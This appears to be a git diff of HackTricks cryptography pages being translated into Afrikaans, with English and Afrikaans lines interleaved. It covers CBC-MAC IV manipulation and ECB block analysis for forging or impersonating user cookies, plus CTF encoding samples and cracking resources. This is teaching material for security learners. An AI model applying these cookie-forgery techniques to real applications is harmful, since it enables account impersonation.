3. Stel die koekie in as s32 en dit sal 'n geldige koekie wees vir die gebruiker **Administrator**.
# Attack Controlling IV
# Aanval deur IV te beheer
If you can control the used IV the attack could be very easy.\
If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
As jy die gebruikte IV kan beheer, kan die aanval baie maklik wees.\
As die koekies net die versleutelde gebruikersnaam is, kan jy die gebruiker "**administrator**" naboots deur die gebruiker "**Administrator**" te skep en sy koekie te kry.\
Nou, as jy die IV kan beheer, kan jy die eerste byte van die IV verander sodat **IV\[0] XOR "A" == IV'\[0] XOR "a"** en die koekie vir die gebruiker **Administrator** hergenereer. Hierdie koekie sal geldig wees om die gebruiker **administrator** met die oorspronklike **IV** na te boots.
## References
## Verwysings
More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
Meer inligting in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

205
cryptography/crypto-ctfs-tricks.md
View file

@ -1,22 +1,22 @@
# Crypto CTFs Tricks
# Crypto CTFs Truuks
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Online Hashes DBs
## Aanlyn Hash-databasisse
* _**Google it**_
* _**Google dit**_
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
* [https://crackstation.net/](https://crackstation.net)
@ -28,26 +28,26 @@ Other ways to support HackTricks:
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## Magic Autosolvers
## Toveroplossers
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic-module)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
## Encoders
## Enkoders
Most of encoded data can be decoded with these 2 ressources:
Die meeste gekodeerde data kan ontsluit word met hierdie 2 hulpbronne:
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### Substitution Autosolvers
### Substitusie Toveroplossers
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
* [https://quipqiup.com/](https://quipqiup.com) - Very good !
* [https://quipqiup.com/](https://quipqiup.com) - Baie goed!
#### Caesar - ROTx Autosolvers
#### Caesar - ROTx Toveroplossers
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
@ -55,97 +55,89 @@ Most of encoded data can be decoded with these 2 ressources:
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
### Base Encodings Autosolver
### Basisenkoderings Toveroplossers
Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
Kyk na al hierdie basisse met: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
* **Ascii85**
* `BQ%]q@psCd@rH0l`
* `BQ%]q@psCd@rH0l`
* **Base26** \[_A-Z_]
* `BQEKGAHRJKHQMVZGKUXNT`
* `BQEKGAHRJKHQMVZGKUXNT`
* **Base32** \[_A-Z2-7=_]
* `NBXWYYLDMFZGCY3PNRQQ====`
* `NBXWYYLDMFZGCY3PNRQQ====`
* **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
* `pbzsaamdcf3gna5xptoo====`
* `pbzsaamdcf3gna5xptoo====`
* **Base32 Geohash** \[_0-9b-hjkmnp-z_]
* `e1rqssc3d5t62svgejhh====`
* `e1rqssc3d5t62svgejhh====`
* **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
* `D1QPRRB3C5S62RVFDHGG====`
* `D1QPRRB3C5S62RVFDHGG====`
* **Base32 Extended Hexadecimal** \[_0-9A-V_]
* `D1NMOOB3C5P62ORFDHGG====`
* `D1NMOOB3C5P62ORFDHGG====`
* **Base45** \[_0-9A-Z $%\*+-./:_]
* `59DPVDGPCVKEUPCPVD`
* `59DPVDGPCVKEUPCPVD`
* **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
* `2yJiRg5BF9gmsU6AC`
* `2yJiRg5BF9gmsU6AC`
* **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
* `2YiHqF5bf9FLSt6ac`
* `2YiHqF5bf9FLSt6ac`
* **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
* `pyJ5RgnBE9gm17awU`
* `pyJ5RgnBE9gm17awU`
* **Base62** \[_0-9A-Za-z_]
* `g2AextRZpBKRBzQ9`
* `g2AextRZpBKRBzQ9`
* **Base64** \[_A-Za-z0-9+/=_]
* `aG9sYWNhcmFjb2xh`
* `aG9sYWNhcmFjb2xh`
* **Base67** \[_A-Za-z0-9-_.!\~\_]
* `NI9JKX0cSUdqhr!p`
* `NI9JKX0cSUdqhr!p`
* **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `BQ%]q@psCd@rH0l`
* `BQ%]q@psCd@rH0l`
* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `<~BQ%]q@psCd@rH0l~>`
* `<~BQ%]q@psCd@rH0l~>`
* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
* `Xm4y`V\_|Y(V{dF>\`
* `Xm4y`V\_|Y(V{dF>\`
* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
* `Xm4y|V{~Y+V}dF?`
* `Xm4y|V{~Y+V}dF?`
* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
* `frDg[*jNN!7&BQM`
* `frDg[*jNN!7&BQM`
* **Base100** \[]
* `👟👦👣👘👚👘👩👘👚👦👣👘`
* `👟👦👣👘👚👘👩👘👚👦👣👘`
* **Base122** \[]
* `4F ˂r0Xmvc`
* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
* `DmPsv8J7qrlKEoY7`
* `4F
* `DmPsv8J7qrlKEoY7`
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
* `kLD8iwKsigSalLJ5`
* `kLD8iwKsigSalLJ5`
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
* `ayRiIo1gpO+uUc7g`
* `ayRiIo1gpO+uUc7g`
* **ESAB46** \[]
* `3sHcL2NR8WrT7mhR`
* `3sHcL2NR8WrT7mhR`
* **MEGAN45** \[]
* `kLD8igSXm2KZlwrX`
* `kLD8igSXm2KZlwrX`
* **TIGO3FX** \[]
* `7AP9mIzdmltYmIP9mWXX`
* `7AP9mIzdmltYmIP9mWXX`
* **TRIPO5** \[]
* `UE9vSbnBW6psVzxB`
* `UE9vSbnBW6psVzxB`
* **FERON74** \[]
* `PbGkNudxCzaKBm0x`
* `PbGkNudxCzaKBm0x`
* **GILA7** \[]
* `D+nkv8C1qIKMErY1`
* `D+nkv8C1qIKMErY1`
* **Citrix CTX1** \[]
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### HackerizeXS \[_╫Λ↻├☰┏_]
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
### Morse
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
```
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
* [http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html) - 404 Dood: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder
```
begin 644 webutils_pl
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
@ -154,129 +146,117 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
`
end
```
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
### XXEncoder
### XXKoder
XXEncoder is a simple encoding technique that converts ASCII characters to their hexadecimal representation. It is commonly used to obfuscate data or bypass certain security measures. To decode the encoded data, you can use an online XXDecoder tool or write a custom script. Keep in mind that XXEncoder is a basic encoding method and may not provide strong security.
```
begin 644 webutils_pl
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
5Hol-G2xAEE++
end
```
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
ryvkryvkryvkryvkryvkryvkryvk
=yend size=28 crc32=35834c86
```
* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
### BinHex
BinHex is 'n formaat wat gebruik word om binêre lêers te vertaal na 'n teksformaat wat veilig oorgedra kan word. Dit word dikwels gebruik om lêers te omskep vir oordrag oor e-pos of ander kommunikasiekanale wat slegs teks ondersteun. BinHex gebruik 'n spesiale algoritme om die binêre data om te skakel na 'n reeks ASCII-karakters. Hierdie omgesette teks kan dan veilig oorgedra word sonder om data te verloor of te beskadig. BinHex is 'n nuttige hulpmiddel vir die oordra van binêre lêers in 'n veilige en betroubare formaat.
```
(This file must be converted with BinHex 4.0)
:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
-38K26%'d9J!!:
```
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85
ASCII85 is 'n binêre na teks-koderingsalgoritme wat gebruik word om binêre data om te skakel na 'n teksvorm wat bestaan uit ASCII-karakters. Dit is nuttig vir die oordra van binêre data in 'n teksgebaseerde omgewing, soos e-pos of tekslêers. ASCII85 kodeer elke 4 byte van binêre data na 5 ASCII-karakters.
```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
```
* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
### Dvorak keyboard
### Dvorak sleutelbord
```
drnajapajrna
```
* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard)
* [https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard)
### A1Z26
Letters to their numerical value
Briewe na hul numeriese waarde
```
8 15 12 1 3 1 18 1 3 15 12 1
```
### Affine Cipher Encode
Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
Letter na nommer `(ax+b)%26` (_a_ en _b_ is die sleutels en _x_ is die letter) en die resultaat terug na 'n letter.
```
krodfdudfrod
```
### SMS Kode
### SMS Code
**Multitap** [vervang 'n letter](https://www.dcode.fr/word-letter-change) deur herhaalde syfers wat gedefinieer word deur die ooreenstemmende sleutelkode op 'n mobiele [foon sleutelbord](https://www.dcode.fr/phone-keypad-cipher) (Hierdie modus word gebruik wanneer SMS'e geskryf word).\
Byvoorbeeld: 2=A, 22=B, 222=C, 3=D...\
Jy kan hierdie kode identifiseer omdat jy\*\* verskeie herhaalde syfers\*\* sal sien.
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\
You can identify this code because you will see\*\* several numbers repeated\*\*.
Jy kan hierdie kode ontsyfer by: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### Bacon Code
Substitude each letter for 4 As or Bs (or 1s and 0s)
### Bacon Kode
Vervang elke letter met 4 As of Bs (of 1s en 0s)
```
00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
```
### Runes
### Rune
![](../.gitbook/assets/runes.jpg)
## Compression
## Saamdruk
**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
**Raw Deflate** en **Raw Inflate** (jy kan beide in Cyberchef vind) kan data saamdruk en ontspan sonder koppe.
## Easy Crypto
## Maklike Kriptografie
### XOR - Autosolver
### XOR - Outomatiese oplosser
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
### Bifid
A keywork is needed
'n Sleutelwoord is nodig
```
fgaargaamnlunesuneoa
```
### Vigenere
A keywork is needed
'n Sleutelwoord is nodig
```
wodsyoidrods
```
* [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## Strong Crypto
## Sterk Kriptografie
### Fernet
2 base64 strings (token and key)
2 basis64 strings (token en sleutel)
```
Token:
gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
@ -284,19 +264,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC
Key:
-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
```
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
### Samir Secret Sharing
A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
### Samir Geheime Deling
'n Geheim word in X dele verdeel en om dit te herstel, het jy Y dele nodig (_Y <=X_).
```
8019f8fa5879aa3e07858d08308dc1a8b45
80223035713295bddf0b0bd1b10a5340b89
803bc8cf294b3f83d88e86d9818792e80cd
```
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSL brute-force
@ -304,7 +281,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
## Tools
## Gereedskap
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
@ -312,14 +289,14 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

100
cryptography/electronic-code-book-ecb.md
View file

@ -1,104 +1,94 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
# ECB
(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
(ECB) Elektroniese Kodeboek - simmetriese enkripsieskema wat elke blok van die duidelike teks vervang deur die blok van die sleutelteks. Dit is die eenvoudigste enkripsieskema. Die hoofidee is om die duidelike teks in blokke van N-bits (afhangende van die grootte van die blok van insetdata, enkripsie-algoritme) te verdeel en dan elke blok van duidelike teks te enkripteer (de-enkripteer) met die enigste sleutel.
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
Using ECB has multiple security implications:
Die gebruik van ECB het verskeie veiligheidsimplikasies:
* **Blocks from encrypted message can be removed**
* **Blocks from encrypted message can be moved around**
* **Blokke van die enkripteerde boodskap kan verwyder word**
* **Blokke van die enkripteerde boodskap kan rondgeskuif word**
# Detection of the vulnerability
# Opname van die kwesbaarheid
Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`<username>|<password>`**.\
Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**.
Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`**
Stel jou voor jy teken verskeie kere in by 'n toepassing en jy kry **altyd dieselfde koekie**. Dit is omdat die koekie van die toepassing **`<gebruikersnaam>|<wagwoord>`** is.\
Dan genereer jy twee nuwe gebruikers, albei met dieselfde lang wagwoord en **byna** dieselfde **gebruikersnaam**.\
Jy kom agter dat die blokke van 8B waar die inligting van beide gebruikers dieselfde is, **gelyk** is. Jy vermoed dat dit dalk is omdat **ECB gebruik word**.
Soos in die volgende voorbeeld. Let op hoe hierdie **2 gedekodeerde koekies** verskeie kere die blok **`\x23U\xE45K\xCB\x21\xC8`** bevat.
```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
```
Dit is omdat die **gebruikersnaam en wagwoord van daardie koekies verskeie kere die letter "a" bevat het** (byvoorbeeld). Die **blokke** wat **verskillend** is, is blokke wat **ten minste 1 verskillende karakter** bevat het (miskien die skeidingsteken "|" of 'n nodige verskil in die gebruikersnaam).
This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username).
Nou hoef die aanvaller net te ontdek of die formaat `<gebruikersnaam><skeidingsteken><wagwoord>` of `<wagwoord><skeidingsteken><gebruikersnaam>` is. Om dit te doen, kan hy net **verskeie gebruikersname genereer** met **soortgelyke en lang gebruikersname en wagwoorde** totdat hy die formaat en die lengte van die skeidingsteken vind:
